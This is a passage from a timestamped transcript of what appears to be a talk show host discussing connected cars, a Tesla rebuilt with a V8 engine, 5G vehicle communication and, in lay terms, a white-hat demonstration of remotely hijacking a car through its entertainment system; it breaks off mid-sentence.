As we look into the future, I'm really concerned. I don't want to buy one of these new cars, at the same time as I do, because they are cool. But I don't want to buy one of those because of the real problem that we could have, of having that car [01:14:07] need an upgrade and not being able to do it. I watched a video of a guy who took a Tesla that had been damaged badly in a flood, and he was able to buy it for cheap. Why? Because Tesla will not sell you new motors and new batteries for a car like that. So he got the car for cheap. He found a Chevy Camaro that had been wrecked, but its engine and transmission were just fine. [01:14:37] He ripped everything out of the Tesla, and went ahead after that, because you've got to clean that out, the water damage. You spray wash all of the inside. He got right down to the aluminum. Everything that wasn't part of the core aluminum chassis was gone. And then he built it back up again. He managed to keep all of those Tesla systems working, that screen that you have up front that does the temperature control, cruise, maps, everything. [01:15:09] He kept that. It was able to work, the automated stuff, cruise control type stuff. And now he had a very hot car that looked like a Tesla. He took it out to SEMA, which is pretty cool. I'd love to see that. But it was a Tesla with a big V8 gasoline engine in it. He's done quite a good job on it. [01:15:33] It was quite amazing to see. It took them months. It was him and some of his buddies. These new cars are even more connected than my friend's Subaru is. They get downloads from the cloud. Some of them are using Wi-Fi and 5G.
Really, one of the big promises of 5G is, hey, our cars can talk to each other, because now you can get a millisecond delay in going from one car to another, versus what you have today, which can be a half a second or more, which can be the difference between having a rear-end collision and being able to stop in time when it comes to these automated systems. [01:16:15] So they are more connected. They connect to the Wi-Fi in your homes. They connect to, obviously, the 5G network, which is where things are going right now. But what's happening with the hackers? Because really, what we're talking about isn't a computer on wheels. Oh no. Dozens of computers inside that car. And your car has a network inside of it, and has had for many years, this CAN bus network, and even fancier ones nowadays that connect all of your systems together. [01:16:50] So your entertainment system, for instance, is connected to this network. And that was used, you might remember, a couple of years ago on a Chrysler product, where the bad guy installed something, using a thumb drive, onto that entertainment system, and had a reporter drive that car down the road. This is all known. [01:17:13] It was all controlled. And the bad guy was able to, right there, in the demonstration, in this case I guess you'd call him a white hat hacker, he drove that car right off the road while the reporter was trying to steer otherwise, because cars nowadays don't have a direct linkage between anything anymore. [01:17:36] That's why I love my 1980 Mercedes diesel. You turn the steering wheel. It isn't act